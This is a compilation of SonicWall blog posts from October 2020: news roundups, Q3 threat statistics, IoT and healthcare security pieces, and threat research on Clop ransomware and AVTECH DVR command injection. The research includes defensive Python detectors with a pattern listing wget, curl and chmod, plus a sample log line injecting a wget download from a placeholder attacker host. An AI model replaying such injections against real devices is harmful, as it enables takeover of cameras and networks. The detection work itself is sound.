Cybersecurity News & Trends – 10-30-20

This week, Ryuk is on the rise, medical records are on display, and Maze is on its way out.


SonicWall in the News

Amid Pandemic, Hospitals Warned of ‘Credible’ and ‘Imminent’ Cyberthreat — ABC News

  • SonicWall’s Q3 threat data detailing the increase of Ryuk ransomware is cited in this article, which centers around FBI’s warning of potential attacks against healthcare providers.

Review: The SonicWall SWS12-10FPOE Switch Simplifies Security — BizTech

  • This article reviews the SWS12-10FPOE Switch and mentions the benefit the product will have on small businesses and branch offices.

FBI Warns of Imminent Wave of Ransomware Attacks Hitting Hospitals — CNET

  • SonicWall’s Q3 Threat Data on the surge of ransomware is included in CNET’s article covering potential attacks on the healthcare industry.

Ryuk Wakes From Hibernation; FBI, DHS Warn of Healthcare Attacks — Cybersecurity Dive

  • Samantha Schwartz included SonicWall’s Q3 Threat data and a quote from CEO Bill Conner in an article on possible upcoming attacks on the healthcare industry.

Venomous Bear and Charming Kitten Are Mentioned In Dispatches. Ryuk Targets Hospitals. Maze Shutdown? — CyberWire

  • CyberWire included a link to SonicWall’s Q3 Threat data press release in the “Cyber Trends” section of its daily newsletter.

Malware Levels Drop, Attacks Become More Targeted — BetaNews

  • BetaNews’ article cites SonicWall’s Q3 Threat data, highlighting the drop in malware and the rise in ransomware and IoT malware attacks so far in 2020.

Ryuk Ransomware Responsible for One Third of All Ransomware Attacks in 2020 — Security Magazine

  • Security Magazine reports on SonicWall’s Q3 Threat Data, highlighting the surge in Ryuk ransomware that’s occurred in 2020.

Industry News

Maze ransomware is shutting down its cybercrime operation — Bleeping Computer

  • The Maze cybercrime gang is shutting down its operations after becoming one of the most prominent ransomware groups.

Trump Campaign Website Is Defaced by Hackers — The New York Times

  • The defacement lasted less than 30 minutes, and the hackers appeared to be looking to generate cryptocurrency.

Microsoft says Iranian hackers targeted conference attendees — The Washington Times

  • Iranian hackers reportedly posed as conference organizers in an attempt to break into the email accounts of “high-profile” people.

EXCLUSIVE: Medical Records of 3.5 Million U.S. Patients Can be Accessed and Manipulated by Anyone — Security Week

  • The results of 13 million medical examinations relating to around 3.5 million U.S. patients are unprotected and available to anyone on the internet, SecurityWeek has learned.

Spy agency ducks questions about ‘back doors’ in tech products — Reuters

  • The U.S. National Security Agency is rebuffing efforts by a leading congressional critic to determine whether it is continuing to place so-called back doors into commercial technology products, a controversial practice that critics say damages both U.S. industry and national security.

FBI: Hackers stole government source code via SonarQube instances — Bleeping Computer

  • The FBI issued a flash alert warning of hackers stealing data from U.S. government agencies and enterprise organizations via insecure and internet-exposed SonarQube instances.

Election Officials Warn of Widespread Suspicious Email Campaign — The Wall Street Journal

  • Local election officials in the U.S. have been receiving suspicious emails that appear to be part of a widespread and potentially malicious campaign targeting several states.

Bitcoin Approaches Highest Level Since Post-Bubble Crash in 2018 — Bloomberg

  • Bitcoin is approaching levels not seen in nearly three years.

US Treasury Sanctions Russian Institution Linked to Triton Malware — Dark Reading

  • Triton, also known as TRISIS and HatMan, was developed to target and manipulate industrial control systems, the US Treasury reports.

REvil ransomware gang claims over $100 million profit in a year — Bleeping Computer

  • REvil ransomware developers say that they made more than $100 million in one year of extorting large businesses.

Data breach at Finnish psychotherapy center takes a darker turn with extortion attempts — Cyberscoop

  • Patients of a prominent Finnish psychotherapy practice reportedly had their information posted on the dark web after being told they could protect their data by directly paying a ransom.

In Case You Missed It

Q3 Cyber Threat Intelligence Details a September to Remember

Despite predictions from many in the political sphere, the autumn of 2020 didn’t bring an October Surprise. But it did bring plenty of September compromise, as cybercriminals ramped up their nefarious activities to an unprecedented level.

Based on SonicWall’s Q3 cyber threat intelligence data, in nearly every threat category, the numbers for September were doing one of two things: rising, or skyrocketing. Between packed hospitals, unsecure remote students and workers, and perhaps the most high-profile presidential election in the last 50 years, there have never been so many vulnerable to attack — or so many willing to profit from them.

“For most of us, 2020 has been the year where we’ve seen economies almost stop, morning commutes end and traditional offices disappear,” said SonicWall President and CEO Bill Conner. “However, the overnight emergence of remote workforces and virtual offices has given cybercriminals new and attractive vectors to exploit. These findings show their relentless pursuit to obtain what is not rightfully theirs for monetary gain, economic dominance and global recognition.”

SonicWall, which blocks an average of more than 28 million malware attacks globally each day, recorded 4.4 billion malware attacks and 199.7 million ransomware attacks globally through the first three quarters of 2020, a year-over-year decrease of 39% and increase of 40%, respectively. Here’s a closer look at what we found:

Malware down 39% overall … but trending upward

Overall in Q3 2020 malware has continued to drop, falling to 4.4 billion hits — a nearly 40% decrease from last year. The news was even better in some areas; for example, in Germany malware dropped by nearly two-thirds, and in India it fell by nearly 70%, according to SonicWall data.

It’s worth noting, however, that Q3 ended on a much-less-optimistic note. As you’d expect with such a decrease, only two months in 2020 registered an increase in malware: May and September. May’s (relatively) modest gain of 13.3 million was little more than a blip, and quickly reversed itself.

The increase in September, however, is significantly more worrying. First of all, the increase between August and September is nearly five times as large as that between April and May, and added a total of 59 million hits.

Second, since September is the last month in Q3 (and thus the last month for which we have complete data), we don’t know yet if this is an anomaly, or if this is the first sign of malware attacks beginning to rise again from what many had expected to be a slow, but permanent, decline.

Ongoing increase in Ransomware picking up steam

In the mid-year update to the SonicWall 2020 Cyber Threat Report, we noted that the total number of ransomware hits during the first half of the year was up 20% over the same time period in 2019. But with June registering a slight decrease, we hoped that this would mark the beginning of a trend, and that ransomware’s reign of terror would, if not end, at least give us a bit of breathing room during an otherwise difficult time.

In true 2020 fashion, it turns out the opposite has happened, as the 20% increase at the end of Q2 grew to a 40% increase by the end of Q3. While that’s worrying enough, the pace of this increase offers further cause for concern.

After a small increase of 12.4% from June to July (16.7 million to 18.8 million), August and September continued to pick up momentum. Between July and August, total ransomware rose from 18.8 million to 25.5 million, and then from August to September it jumped even more, from 25.5 million to 34.1 million.

Ryuk attacks account for third of year’s ransomware

Much of this increase is coming from the precipitous rise in the number of Ryuk detections. First discovered in August 2018, Ryuk is a relatively young ransomware family, and one that got off to a slow start among SonicWall customers.

Through Q3 2019, SonicWall detected just 5,277 Ryuk attacks. Through Q3 2020, SonicWall detected 67.3 million Ryuk attacks. Not only does this amount to a mind-blowing 1,275,245% increase, it also represents more than a third of all ransomware attacks so far this year.

Ryuk is especially dangerous because it’s targeted, manual and often leveraged via a multi-stage attack (Emotet > Trickbot > Ryuk). In other words, Ryuk is like the cockroach of the malware world — if you see it, chances are the infestation goes much, much deeper than you think.

The fact that SonicWall is seeing such a large uptick implies that Ryuk may be proliferating to larger groups of criminals, increasing the chances of any one organization being hit. However, this spike could also mean that Ryuk operators have begun hunting outside their usual stomping grounds and have started attacking SMBs and schools as well.

Unfortunately, we’ve also seen an increase in attacks on hospitals — and the problem may soon get much worse. Based on “credible information of an increased and imminent cybercrime threat to U.S. hospitals,” on October 28 CISA, FBI and HHS issued a joint cybersecurity advisory warning that the Ryuk ransomware may gain entry via Trickbot, and strongly advised hospitals and other healthcare facilities to take the recommended steps to protect against being compromised.

IoT malware hits second-highest level ever

In our mid-year update to the 2020 SonicWall Cyber Threat Report, we noted that, if the patterns we were seeing at the time held, total IoT attacks for 2020 would surpass both 2018 and 2019 levels.

Now, with an entire quarter left to go, we’ve already nearly reached that point. Through Q3, SonicWall registered 32.4 million IoT malware attacks, closing in on 2019’s total of 34.4 million attacks and within a hair’s breadth of 2018’s total (32.7 million attacks).

But once again, the real story here is September. During that month, SonicWall recorded 6.8 million IoT malware attacks, up 137% from the previous month, and more than the totals for July and August put together. This number also represents an increase of 69.2% over 2020’s previous high in March, and is 68.7% higher than in September 2019.

5G and the Security of Connected Devices

In a world with watches that wirelessly beam video across the country, refrigerators that can read you the local weather report and Wi-Fi-enabled barbecue grills, it’s hard to imagine the world of connected devices becoming much more complex.

But the imminent 5G revolution is likely to bring with it devices that advance comfort, convenience, entertainment and safety in ways we never thought possible — all of which will need secure wireless controls so as not to be turned against us.

During the final week of National Cybersecurity Awareness Month (NCSAM), we’re taking a closer look at the future of 5G and internet-connected devices — how they could benefit us, what sorts of dangers they could pose, and what we can do to secure them, both now and into the future.

According to the New Yorker, “5G will pump $12 trillion into the global economy by 2035 and add 22 million new jobs in the United States alone,” while ushering in “a fourth industrial revolution.”

This could be hard to imagine if you primarily view 5G as something that could someday allow you to download the entire Harry Potter film catalog faster than you can say “Accio Nostalgia!” But the true value of 5G to society is likely to come in the form of technological advancements not intended for the consumer market, such as robots making precision-machined components in a factory; surgeons using VR headsets and gloves to perform surgeries remotely; and smart cities that function as a sort of macrocosm of our current smart homes, tying together things like trash collection, parking meters and public restrooms to improve safety, sanitization and convenience.

That isn’t to say there won’t be plenty for the average consumer to enjoy, however. Truly autonomous vehicles that connect with traffic signals and other vehicles and react more quickly than human drivers are already in the works, and console-quality video games on your phone (or video games on your console with near-zero lag) are a logical next step once the anticipated reductions in latency come to pass.

Stores that allow you to try on clothing without stepping foot into a dressing room — or see what a new sofa would look like in your living room without leaving the furniture store — are a natural progression from the sort of augmented reality first brought to the mainstream by Pokémon Go.

And that’s to say nothing of your cellphone: anticipated download speeds of up to 10 Gbps will revolutionize what you can do with your phone, how quickly you can do it, and how many things you can do at once without affecting performance.

But as with other advances in digital technology, the same things that can make life easier for us can also make life immeasurably more difficult in the hands of cybercriminals. 5G will significantly increase the number of IoT devices coming online — and right now IoT security regulations are basically nonexistent.

As a result, as this increasing attack surface continues to draw more cybercriminals, we’re likely to see skyrocketing rates of IoT malware. The addition of more devices and more bandwidth doesn’t just give cybercriminals more to target directly — it could also bring about DDoS attacks far more debilitating and widespread than the ones we see today. Wireless security will be a must.

To stop the influx of attacks will require the cooperation of all stakeholders. Minimum cybersecurity requirements for manufacturers of IoT devices would go a long way toward preventing attacks, as would the establishment of a rating system (similar to the ones that currently measure usage cost on water heaters) to inform customers how safe a particular device is compared to others.

There are also things users can do to stay safe — many of which are best practices now, but will become crucial as 5G technology is fully adopted:

  • Install malware protection on your devices, if it isn’t there already
  • Ensure that none of your devices, particularly IoT devices, are still using the factory default password
  • Always make sure that your devices are patched and running the latest OS version
  • Keep up with the latest developments in cybercrime — just because you’re adequately secured now doesn’t mean you will be in the future
  • Only purchase internet-connected devices from companies who have made securing these devices a top priority.

As Champions of National Cyber Security Awareness Month, SonicWall is committed to helping organizations develop strategies for anywhere, anytime, any device security — not just during October, but all year long. For more cybersecurity news and tips, follow us on social media and check out our blog.

A new variant of Clop Ransomware surfaces

The SonicWall Capture Labs threat research team observed reports of a new variant family of Clop ransomware (Detected as Clop.RSM) actively spreading in the wild.

The Clop ransomware encrypts the victim’s files with a strong encryption algorithm until the victim pays a fee to get them back.

Infection Cycle

The ransomware adds the following files to the system:

  • Malware.exe
  • %CurrentFolder%\HotGIrls (ZeroKb)
  • %CurrentFolder%\Clearnetworkdns_11-22-33.bat

To defeat emulators and time-bound sandboxes before the real malicious code runs, it calls APIs from Kernel32.dll with invalid parameters in a loop that repeats 666,000 times.

After the loop completes, it starts enumerating running processes.

The malware checks for the presence of the following processes belonging to security vendors:

  • SBAMSvc.exe (GFI AntiMalware antivirus product)
  • VipreAAPSvc.exe (Vipre antivirus product)
  • SBAMTray.exe (Vipre antivirus product)
  • SBPIMSvc.exe (Sunbelt AntiMalware antivirus product)
  • WRSA.exe (WebRoot antivirus product)

If it finds any of these processes, it delays execution by 10 seconds by calling the Sleep() API twice with a 5-second value.

It creates a mutex named “^_-HappyLife^_-” and checks whether it already existed by calling WaitForSingleObject and comparing the result with 0. A non-zero result means another instance is already running, in which case it exits.

After that it follows the normal execution path (the path taken when none of the security-vendor processes listed above is present).

It drops a batch file in the folder from which the malware sample is executed and runs it via the ShellExecute API.

It then creates two threads. One uses MPR.DLL to enumerate network resources and encrypt files found on network drives; the other enumerates running processes.

The first thread walks directories and subdirectories with the FindFirstFile and FindNextFile APIs. For each file or folder it computes a hash of the path name and compares it with a list of hardcoded hash values; on a match, that file or folder is skipped and not encrypted.

The second thread enumerates running processes and converts each process name to upper case. It then computes a hash of the name using the same routine used for file and folder names, compares it against the hardcoded hash values, and terminates any process whose hash matches.

It encrypts the file’s bytes with a randomly generated AES key. After encryption it appends the marker “Clop^_” to the end of the file, followed by the per-file key encrypted with the master RSA key hardcoded in the malware.

The .Clop extension is appended to the encrypted files.

And in each folder it drops the ClopReadMe.txt containing ransom note.
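The on-disk indicators listed above (the .Clop extension, the “Clop^_” end-of-file marker with the wrapped key behind it, the ClopReadMe.txt note, and the dropped HotGIrls and Clearnetworkdns_11-22-33.bat artifacts) are enough for a first-pass triage of a suspect share. The scanner below is an added example, not SonicWall Capture Labs code. It assumes the wrapped key blob is under 4 KiB (the write-up does not state the RSA key size, so the blob length is reported rather than assumed) and builds a constructed sample tree so it runs offline.

```python
"""Triage scanner for the Clop on-disk artifacts described in the write-up.

Added example, not Capture Labs code. Walks a directory tree and reports:
  - files carrying the .Clop extension, with whether the Clop^_ marker is present
    and how many bytes (the RSA-wrapped per-file key) follow it
  - files that carry the marker but not the extension (renamed / interrupted)
  - ransom notes and the dropped helper files
"""
import os
import tempfile

MARKER = b"Clop^_"                      # end-of-file marker named in the write-up
EXTENSION = ".Clop"
NOTE_NAME = "ClopReadMe.txt"
DROPPED_NAMES = {"HotGIrls", "Clearnetworkdns_11-22-33.bat"}
MAX_TAIL = 4096                         # assumption: marker + wrapped key fit in the last 4 KiB


def inspect_tail(path):
    """Return (has_marker, wrapped_key_len) for one file.

    The marker sits between the AES-encrypted body and the RSA-wrapped key,
    so the last occurrence of the marker in the tail is the one that counts.
    """
    size = os.path.getsize(path)
    with open(path, "rb") as fh:
        fh.seek(max(0, size - MAX_TAIL))
        tail = fh.read()
    idx = tail.rfind(MARKER)
    if idx < 0:
        return False, 0
    return True, len(tail) - idx - len(MARKER)


def scan_tree(root):
    """Walk `root`; return a dict of indicator class -> sorted list of hits."""
    found = {"encrypted": [], "marker_only": [], "notes": [], "dropped": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name == NOTE_NAME:
                found["notes"].append(path)
                continue
            if name in DROPPED_NAMES:
                found["dropped"].append(path)
                continue
            has_marker, key_len = inspect_tail(path)
            if name.endswith(EXTENSION):
                found["encrypted"].append((path, has_marker, key_len))
            elif has_marker:
                # marker present without the extension: renamed or partially processed
                found["marker_only"].append((path, key_len))
    for hits in found.values():
        hits.sort()
    return found


def build_sample_tree():
    """Constructed sample data: one encrypted file, one note, one dropped
    zero-byte artifact and one clean file. Returns the temporary root."""
    root = tempfile.mkdtemp(prefix="clop_triage_")
    wrapped_key = b"\x11" * 256         # constructed stand-in for the RSA-wrapped AES key
    with open(os.path.join(root, "report.docx" + EXTENSION), "wb") as fh:
        fh.write(os.urandom(1000) + MARKER + wrapped_key)
    with open(os.path.join(root, NOTE_NAME), "w") as fh:
        fh.write("constructed ransom note placeholder\n")
    with open(os.path.join(root, "HotGIrls"), "wb"):
        pass                            # zero-byte file, as listed in the write-up
    with open(os.path.join(root, "clean.txt"), "w") as fh:
        fh.write("no indicators here\n")
    return root


if __name__ == "__main__":
    for kind, hits in scan_tree(build_sample_tree()).items():
        print(kind, hits)
```

Point it at a mounted image or share root rather than a live system; the scanner only reads file tails, so it is safe on read-only evidence, and the recorded wrapped-key length is a quick way to confirm that every .Clop file came from the same variant.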


SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Clop.RSM (Trojan)

Cybersecurity News & Trends – 10-23-20

While election security is still making headlines, education news moved to the forefront this week as K-12 institutions continue fighting off a barrage of cyberattacks.


SonicWall in the News

Hackney Council Cyberattack: Why Are Hackers Targeting The Public Sector? — IT Supply Chain

  • Terry Greer-King, VP of EMEA at SonicWall, offers some perspective on the Hackney Council cyberattack — and a warning to other public bodies.

National Cybersecurity Awareness Month – Empower Organizations in Cybersecurity Protocols — Business 2 Community

  • Companies should be doing more to defend against cyberattacks, and during Cybersecurity Awareness Month, cybersecurity professionals are committed to telling you how.

Ripple20 Isn’t An Anomaly – IoT Security is a Mess (Still) — Infosecurity Magazine

  • A new SonicWall report found a 50% increase in IoT malware attacks in the first half of 2020 alone — a number that’s sure to rise further as the number of IoT devices coming online continues to rise.

Industry News

UK’s GCHQ spy chief: We must engage business to harness cyber talent for future — Reuters

  • The head of Britain’s GCHQ agency said on Wednesday it was seeking to engage more with business to harness top cyber talent.

Botnet Fights Back After Microsoft’s Election Security Takedown — Bloomberg

  • After Microsoft led a global attack against a highly prolific malware group, the company says it’s winning the battle to destabilize the malicious botnet ahead of the U.S. presidential election.

LockBit ransomware moves quietly on the network, strikes fast — Bleeping Computer

  • LockBit ransomware takes as little as five minutes to deploy the encryption routine on target systems once it lands on the victim network.

Mysterious ‘Robin Hood’ hackers donating stolen money — BBC

  • Darkside hackers claim to have extorted millions of dollars from companies, but say they now want to “make the world a better place.” In a post on the Dark Web, the gang posted receipts for $10,000 in Bitcoin donations to two charities.

U.S. Accuses Google of Illegally Protecting Monopoly — The New York Times

  • A victory for the government could remake one of America’s most recognizable companies and the internet economy that it has helped define.

Hackers Smell Blood as Schools Grapple With Virtual Instruction — The Wall Street Journal

  • Many K-12 schools opting for virtual instruction distributed devices to students and teachers. Now, as this unique school year unfolds, hackers are circling.

TrickBot malware under siege from all sides, and it’s working — Bleeping Computer

  • The Trickbot malware operation is on the brink of going down completely following efforts from an alliance of cybersecurity and hosting providers targeting the botnet’s command-and-control servers.

Democrats introduce bill providing $400 million to protect schools from cyberattacks — The Hill

  • The Enhancing K-12 Cybersecurity Act would establish a $400 million “K-12 Cybersecurity Human Capacity” grant program to help protect educational institutions against attacks.

Hackers now abuse BaseCamp for free malware hosting — Bleeping Computer

  • Phishing campaigns have started using Basecamp as part of malicious phishing campaigns that distribute malware or steal login credentials.

Fancy Bear Imposters Are on a Hacking Extortion Spree — Wired

  • Companies worldwide are getting extortion notices from hackers, which claim to be Fancy Bear or the Lazarus Group, warning them to pay up or face powerful DDoS attacks.

Federal watchdog finds escalating cyberattacks on schools pose potential harm to students — The Hill

  • The Government Accountability Office (GAO), a federal watchdog agency, has concluded that an increasing number of cyberattacks on educational institutions are putting students increasingly at risk.

Thousands of infected IoT devices used in for-profit anonymity service — Ars Technica

  • Some 9,000 devices — mostly Android, but also Linux and Darwin OS — have been corralled into the Interplanetary Storm, a botnet whose chief purpose is creating a for-profit proxy service.

Trump signs legislation making hacking voting systems a federal crime — The Hill

  • Trump has signed the Defending the Integrity of Voting Systems Act unanimously approved by the House last month, over a year after the Senate also unanimously passed the legislation.

In Case You Missed It

Capture Client: Purpose-Built for the Distributed Workforce

Before COVID-19 shelter-in-place orders were enacted across North America, I created several educational pieces on the subject of the distributed workforce. At that time, 70% of endpoints in the average company could be found outside the walls of the office at least once a week, and 53% of them could be away from perimeter defenses and physical accountability half of the week or more.

Now that this percentage has risen to nearly 100%, the focus at SonicWall is to give companies more visibility into what endpoints are doing, as well as more tools to keep people accountable, productive and safe online, whether or not they are coming in through VPN.

SonicWall Capture Client was designed to be a standalone security offering with optional built-in synergies with the SonicWall ecosystem. It was intended for the distributed workforce from Day One, and since then we’ve added more tools to stop attacks before they can damage systems, more freedom to add granular controls to web content, and soon, more tools for those who manage tenants.

From the solution’s first build, the goal has been to stop attacks before and as they execute, with remediation steps to quickly resolve problems if an attack ever causes damage. Since those early days, we’ve added Capture ATP sandboxing integration, Device Control to stop infected USB devices, Attack Visualization and more.

Today, Capture Client is widely relied on to keep remote employees safe from outside threats as well as from harmful web properties. By combining Security, Web Filtering and Device Control, Capture Client offers an ideal work-from-home solution:

Security

SonicWall has always been a security-first company. From our beginnings in network security, protecting endpoints from outside threats is in our corporate DNA.

Since many endpoints may not be connecting with the company infrastructure via VPN, endpoint security is usually the first and last line of defense. By leveraging the SentinelOne anti-malware engine, which combines AI with Capture ATP sandboxing integration, we are stopping most (nearly all) attacks before and as they execute. First, the AI engine is constantly monitoring system changes for malicious intent. Secondly, if the engine can’t fully convict a suspicious file, it will be sent to a Capture ATP PoP (Point of Presence) for evaluation. Since Capture ATP can do more with a file than your endpoint is allowed to do by the OS, it can flush out sleeping or seemingly innocuous threats.

This means that, if an employee downloads a malicious attachment from their private email or lands on an infected phishing site, Capture Client’s continuous monitoring technology will stop the attack and inform the end user of the event. If an employee downloads a file designed to activate and connect with a C&C server at a designated time in the future, Capture ATP will identify the threat. If remediation is required, administrators can step in and quickly get any Windows machine back to its last known clean state, no matter where the endpoint sits.

Web Filtering

Years ago, SonicWall first developed Content Filtering Service (CFS) for firewalls — and Content Filtering Client (CFC) — based on our work with school districts, where the goal was to protect the most impressionable among us from abusive content and prevent sites like YouTube from taking too much of a school’s bandwidth. CFS and CFC (which is used to enforce the policies on devices away from firewalls) were built with a lot of tools for those that needed it most — but the business community was also able to benefit from its granular control of web content as needed. These tools have now been added to Capture Client for your use; here are some use cases listed in order of commonality for business users:

Blocking malicious content

The little-known secret that I am trying to reveal is that a lot of companies have access to Content Filtering in one shape or form, but don’t use it. You don’t have to get fancy with it; you can simply use it to block millions of known malicious phishing sites, hacking domains and other malicious IP addresses (think botnets or C&C servers).

Blocking inappropriate material

Every company has an Internet usage policy to help employees avoid certain categories of web content. There are over 50 categories such as Adult/Mature Content, Drugs/Illegal Drugs, Illegal Skills, or Nudism that can be blocked.

Blocking specific social media outlets

When shelter-in-place orders forced workers to stay in their homes, the first complaints from admins I heard (outside of VPN connectivity) were about trying to keep the network open for business traffic due to too many users watching TikTok videos. Some admins will create granular policies to block TikTok, yet keep YouTube open. Policies can also be created to give marketing departments access to Facebook and Twitter, but block their use by those in other departments.

Bandwidth management

If, for example, YouTube is taking up too much bandwidth as people are pulling it through your servers via VPN, one could limit the amount of bandwidth a specific web property can use.

Device Control

In 46% of American homes, both parents are working — which means endpoints from two different companies may sit side by side most of the day. How many of these couples use the same USB devices? Capture Client has the ability to block unknown devices from connecting to the employee endpoint to prevent infection by a compromised USB from another company’s endpoint. If malware were to jump between companies in 2020, this might be a top-three threat vector. But even if you don’t use the Device Control feature, the AI engine within Capture Client will still notice the malicious behavior and stop any malicious scripts from executing.

Conclusion

In short, Capture Client helps secure work-from-home by being a top-in-class, first and last line of defense against online attacks and infected devices, as well as enforcing your internet usage policies. If you’d like more information on how Capture Client keeps people working safely no matter where they are, you’re welcome to listen to one of my recent webcasts, “You Can’t Stop What You Can’t See.”

Attackers actively targeting vulnerable AVTECH devices

The SonicWall Capture Labs threat research team observed attacks exploiting old vulnerabilities in AVTECH devices. AVTECH’s primary products are DVR and mobile surveillance systems. Its products target the IP camera market and are commonly used in intelligence surveillance systems.
Attackers are targeting the following two vulnerabilities in AVTECH products:

1. Unauthenticated command injection in DVR devices

The cgi_query action in Search.cgi performs HTML requests with the wget system command, which uses the received parameters without sanitization or verification. By exploiting this issue, an attacker can execute any system command with root privileges without authentication.

Following are the list of exploits spotted in the wild

2. Authenticated command injection in CloudSetup.cgi

Devices that support the Avtech cloud contain CloudSetup.cgi, which can be accessed after authentication. The exefile parameter of a CloudSetup.cgi request specifies the system command to be executed. Since there is no verification or whitelist-based checking of the exefile parameter, an attacker can execute arbitrary system commands with root privileges.

Following are the list of exploits spotted in the wild for this vulnerability

Decoding the URLs and taking a closer look at them:

Both exploits connect to a malicious domain and download a shell script. The exploit changes the file permissions and executes the shell script, which in turn connects to the attacker-controlled server to download more malicious files.

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • IPS 14697: AVTECH Devices Command Injection
  • IPS 13035: AVTECH Devices Remote Command Execution
  • GAV: Mirai.H
  • GAV: Mirai.H_2
  • GAV: MiraiA.N
  • GAV: MiraiA.N_2

Threat Graph

IoCs:

IP addresses:

  • 185.172.110.205
  • 185.172.110.241
  • 185.172.111.196
  • 185.172.111.202
  • 45.95.168.98

MD5 hashes:

  • dcdeae98d9ab0fa3005ec36b1f55bb5b
  • 99d3ce410735ba5e7008198aae3a6e39
  • 4dcfa2daeb85d89da784e5e1928062de
  • 148a1941582372ce22eacf86b5c7f852
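For anyone who cannot put an IPS in front of these devices, the two request shapes described above (Search.cgi with action=cgi_query carrying shell tokens, and any CloudSetup.cgi request with an exefile parameter) are easy to pick out of web-server or proxy logs. The detector below is an added example, not SonicWall’s IPS signature logic. It assumes combined-format access logs; the CGI directories in the constructed sample lines (/cgi-bin/nobody/ and /cgi-bin/supervisor/) are assumptions, so the rule keys only on the script names and parameters the write-up names, and additionally matches source addresses against the IP addresses from the IoC list above.

```python
"""Log-based detector for the two AVTECH CGI abuses described in the write-up.

Added example, not SonicWall signature code. Sample log lines are constructed.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Source addresses taken from the IoC list in the write-up.
IOC_IPS = {
    "185.172.110.205", "185.172.110.241", "185.172.111.196",
    "185.172.111.202", "45.95.168.98",
}

# Combined-format access log: src ident user [time] "METHOD target proto" status ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Shell chaining tokens and download/exec words that never belong in a DVR search query.
# '&' alone is the normal parameter separator, so only '&&' is treated as suspicious.
SHELL_META = re.compile(r"[;|`]|&&|\$\(|\bwget\b|\bcurl\b|/bin/sh|\bchmod\b")


def classify(line):
    """Return (source_ip, [finding labels]) for one log line; [] means nothing notable."""
    m = LOG_RE.match(line)
    if not m:
        return None, ["unparsed"]
    src = m.group("src")
    parts = urlsplit(m.group("target"))
    script = parts.path.rsplit("/", 1)[-1]
    params = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    # Match metacharacters on the decoded raw query, not on parsed values: parse_qs
    # has changed how it treats ';' across Python versions, and attackers rely on
    # exactly such parser differences.
    decoded_query = unquote(parts.query)

    findings = []
    if script == "Search.cgi" and params.get("action") == "cgi_query":
        if SHELL_META.search(decoded_query):
            findings.append("avtech-search-cgi-command-injection")
        else:
            findings.append("avtech-search-cgi-query")  # unauthenticated; worth logging anyway
    if script == "CloudSetup.cgi" and "exefile" in params:
        # exefile names the command to run; every request carrying it is a finding
        findings.append("avtech-cloudsetup-exefile")
    if src in IOC_IPS:
        findings.append("ioc-source-ip")
    return src, findings


def scan_log(text):
    """Return [(src, findings)] for every line that produced at least one finding."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        src, findings = classify(line)
        if findings:
            hits.append((src, findings))
    return hits


# Constructed sample lines (not captured traffic); attacker.example is a placeholder host.
SAMPLE_LOG = """\
10.0.0.7 - - [23/Oct/2020:10:01:02 +0000] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=10.0.0.9&port=80 HTTP/1.1" 200 312
185.172.110.205 - - [23/Oct/2020:10:01:05 +0000] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=10.0.0.9;wget%20http://attacker.example/x.sh HTTP/1.1" 200 44
45.95.168.98 - - [23/Oct/2020:10:01:09 +0000] "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=ls HTTP/1.1" 200 17
10.0.0.8 - - [23/Oct/2020:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 1024
"""

if __name__ == "__main__":
    for src, findings in scan_log(SAMPLE_LOG):
        print(src, ", ".join(findings))
```

The benign-looking cgi_query request is still labelled, because the endpoint is reachable without authentication and a sudden volume of such requests from the internet is itself a signal; the exefile rule deliberately does not try to judge the command, since the parameter has no legitimate external use.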


Securing Internet-Connected Devices in Healthcare

This article is based on an interview with SonicWall PreSales Engineer Barbara Vibbert, who spent 10 years in healthcare IT and more than 20 years in information security.

From the carts that roll from room to room checking vital signs to the tablet at the check-in desk, internet-connected devices can be seen during every hospital visit. What isn’t visible, however, is the massive infrastructure required to connect and secure them.

While these connected devices have brought countless benefits to healthcare, they also have the potential to endanger patient privacy, data integrity and even the continued survival of the hospitals themselves.

Access control in healthcare environments

Most doctors are not employed by the hospital where they work. Nor are many of the people in charge of maintaining equipment. These individuals have their own laptops, tablets and other devices that IT has no control over, but they require network access in order to do the jobs that keep the hospital running.

Hospitals’ vast access control teams are also needed to regularly onboard large numbers of people at once. In most IT departments, users are onboarded and offboarded throughout the year as employees come and go. In hospitals, however, a large influx of new users must be added each year around July 1, when hospital residencies begin. There can be hundreds of new residents and fellows per year that require onboarding, but hospitals generally only have a five-day window to get them up and running.

An equally sizeable, but completely unpredictable, wave of new users must be onboarded during nursing strikes. Depending on the size of the nursing staff, IT may have to quickly add several hundred new visiting nurses to the network with little warning.

Even within the hospital, data must be accessible for purposes not directly tied to patient care; for example, research and billing. But greater accessibility always brings with it greater risk. In May, an Ohio medical center posted an Excel spreadsheet on its website to comply with new requirements about cost transparency. However, inadvertently included in the spreadsheet were the names, diagnoses, treatment histories and other information of nearly 4,000 patients — a major violation of patient confidentiality laws.

Teleworking in healthcare environments

The online services that hospitals use also have patient privacy implications — and with many healthcare workers now working from home, this is a bigger concern than ever. For example, many hospitals don’t host their own telemedicine, relying instead on Zoom-like platforms … or Zoom itself. Because these sorts of platforms weren’t designed to comply with the heightened privacy regulations governing the healthcare industry, they can present a privacy risk.

The danger here isn’t limited to online interlopers, however. With employees no longer afforded the seclusion of their offices, a number of low-tech privacy risks emerge. For example, if a medical professional is doing a psychiatric consultation from home, a spouse, roommate or even a passer-by could potentially see and hear what’s being discussed through an open door or window.

IoT Devices in healthcare environments

Human-operated devices aren’t the only ones that need safeguarding. Hospitals use countless Internet of Things (IoT) devices, responsible for everything from monitoring patient heart rates, to regulating sleep apnea, to ensuring new parents don’t accidentally leave the hospital with the wrong baby.

You don’t need to worry about cybercriminals hacking into your blood pressure cuff or pulse oximeter, however — these devices are on a separate network that is highly secured and largely inaccessible.

This is largely due to the widespread inability to update and patch these devices. FDA approval is required for any device that comes into contact with a patient. But that approval only extends to the device’s state at the time of approval.

